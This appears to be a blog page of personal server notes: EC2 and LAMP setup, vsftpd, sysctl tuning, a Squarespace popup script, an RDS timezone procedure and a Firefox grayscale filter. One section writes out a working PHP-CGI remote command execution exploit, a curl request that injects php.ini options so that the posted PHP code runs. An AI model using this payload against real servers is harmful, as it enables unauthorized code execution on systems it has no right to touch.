Setting Up a New Amazon EC2 Server (2016-04-23)

Create Amazon EC2 Instance
1. Login to AWS Management Console
2. Select Amazon EC2
3. Click “Instances” from the left menu
4. Click “launch Instance”

Create Elastic IPs
1. Login to AWS Management Console
2. Click “Elastic IPs” from the left menu
3. Click “Allocate New Address”
4. Select “EC2” and click “Yes, Allocate”

Assign Elastic IP to an Instance
1. Right click an IP and select “Associate”
2. Select an instance and click “Yes, Associate”

First Time Connect
1. Download PuttyGen
2. Click “Load” and select the .pem file
3. Click “Save private key”
4. Open putty
5. From the left menu, select Connection > SSH > Auth
6. Click “Browse” and select the ppk file created in step 3
7. Connect to your instance with the username “ec2-user”

Change Password

sudo passwd root

Create user

adduser myhelper
passwd myhelper

Add user to sudoers

visudo
myhelper  ALL=(ALL)       ALL

Configure sshd

vim /etc/ssh/sshd_config
PasswordAuthentication yes
AllowUsers myhelper
/etc/init.d/sshd restart

Change timezone

ln -sf /usr/share/zoneinfo/Hongkong /etc/localtime
(or use tzselect)

Install Apache, MySQL, PHP, FTP

yum install httpd mod_ssl mysql-server php54 php54-mysqlnd php54-common php54-gd php54-mbstring php54-mcrypt php54-devel php54-xml vsftpd

chkconfig httpd on
chkconfig mysqld on
chkconfig vsftpd on

Create virtual host directory

mkdir -p /var/www/vhosts/myhelper.com/subdomains
mkdir -p /var/www/vhosts/myhelper.com/htdocs
mkdir -p /var/www/vhosts/myhelper.com/logs
chown -R myhelper.myhelper /var/www/vhosts/myhelper.com

Configure Apache

vim /etc/httpd/conf/httpd.conf
NameVirtualHost *:80
Include /etc/httpd/conf/extra/httpd-vhosts.conf
<IfModule prefork.c>
    StartServers      30
    MinSpareServers   30
    MaxSpareServers   45
    ServerLimit     4000
    MaxClients      4000
    MaxRequestsPerChild  4000
</IfModule>

vim /etc/php.ini
upload_max_filesize = 5M
post_max_size = 8M
memory_limit = 256M

mkdir /etc/httpd/conf/extra
vim /etc/httpd/conf/extra/httpd-vhosts.conf
<VirtualHost *:80>
   DocumentRoot "/var/www/vhosts/my-helper/htdocs"
   ServerName my-helper.com
    ServerAlias www.my-helper.com
   <Directory "/var/www/vhosts/my-helper/htdocs">
      Options Indexes FollowSymLinks
      AllowOverride All
       Order allow,deny
        Allow from all
  </Directory>
  ErrorLog "/var/www/vhosts/my-helper/logs/error.log"
   #CustomLog "/var/www/vhosts/my-helper/logs/access.log" common
</VirtualHost>

/etc/init.d/httpd restart

Configure Vsftpd

vim /etc/vsftpd/vsftpd.conf
userlist_deny=NO
user_config_dir=/etc/vsftpd/userconfig
chroot_local_user=YES
allow_writeable_chroot=YES
port_enable=YES
pasv_enable=YES
pasv_min_port=21024
pasv_max_port=21048
pasv_address={your public ip address}
vim /etc/vsftpd/user_list
myhelper

mkdir /etc/vsftpd/userconfig
vim /etc/vsftpd/userconfig/myhelper
local_root=/var/www/vhosts/my-helper

/etc/init.d/vsftpd restart

Update sysctl.conf

vim /etc/sysctl.conf
net.ipv4.tcp_tw_reuse=1
net.ipv4.tcp_tw_recycle=0
net.ipv4.tcp_fin_timeout=30
net.ipv4.tcp_max_syn_backlog=8192

sysctl -p

Update Security Group
1. Login to AWS Management Console
2. Click “Security Groups” from the left menu
3. Select your security group
4. Add TCP port 20-21, 80, 21024-21048

Create a popup form to SquareSpace site

1. Add a form to the page

2. Enable Lightbox Mode

3. Inject the below javascript to the page:

<script src=”https://code.jquery.com/jquery-2.1.1.min.js” type=”text/javascript”></script>
<script type=”text/javascript”>
$(function() {
$(‘.lightbox-handle’).hide();
setTimeout(function(){ $(‘.lightbox-handle’).click(); }, 1000);
});
></script>

PHP-CGI Remote Command Execution Vulnerability Exploitation

Example:
curl -i -s -k -X 'POST' \
-H 'User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)' \
--data-binary "<?php system(\"echo hey > ../httpdocs/hey.txt\"); die; ?>" \
"http://www.your-website.com/cgi-bin/php5?%2dd+allow_url_include%3don+%2dd+safe_mode%3doff+%2dd+suhosin%2esimulation%3don+%2dd+disable_functions%3d%22%22+%2dd+open_basedir%3dnone+%2dd+auto_prepend_file%3dphp%3a%2f%2finput+%2dd+cgi%2eforce_redirect%3d0+%2dd+cgi%2eredirect_status_env%3d0+%2dn"

Reference: http://www.praetorian.com/blog/php-cgi-remote-command-execution-vulnerability-exploitation

Change MySQL Timezone on Amazon RDS

1. Create procedure

DELIMITER |
CREATE PROCEDURE mysql.store_time_zone()
IF NOT (POSITION(‘[email protected]’ IN CURRENT_USER()) = 1) THEN
SET SESSION time_zone = ‘+8:00’;
END IF
| DELIMITER ;

2. Validate the procedure (Enter in one line)

CALL mysql.store_time_zone; select NOW();

3. Edit parameter
Login to AWS Manamgent Console > Go to Parameter Groups > Edit Parameters > Search “init_connect” > Edit Values > Enter “CALL mysql.store_time_zone ” > Save

4. Reboot server

Other commands:

// drop Procedure
DROP PROCEDURE IF EXISTS mysql.store_time_zone;

// show current procedures
show procedure status;
show create procedure mysql.store_time_zone;

// revoke permission
REVOKE EXECUTE ON PROCEDURE `mysql`.`store_time_zone` FROM ‘YOUR_DATABASE_USER’@’%’

Reference:
http://mlwmlw.org/2014/03/rds-mysql-timezone-setup/
http://gab-tech.blogspot.hk/2013/12/mysql-change-time-zone-in-rds.html

Grayscale on Firefox

filter: url(“data:image/svg+xml;utf8,<svg xmlns=\’http://www.w3.org/2000/svg\’><filter id=\’grayscale\’><feColorMatrix type=\’matrix\’ values=\’0.3333 0.3333 0.3333 0 0 0.3333 0.3333 0.3333 0 0 0.3333 0.3333 0.3333 0 0 0 0 0 1 0\’/></filter></svg>#grayscale”);

Reference:
http://stackoverflow.com/questions/12173130/css-filter-not-working-in-firefox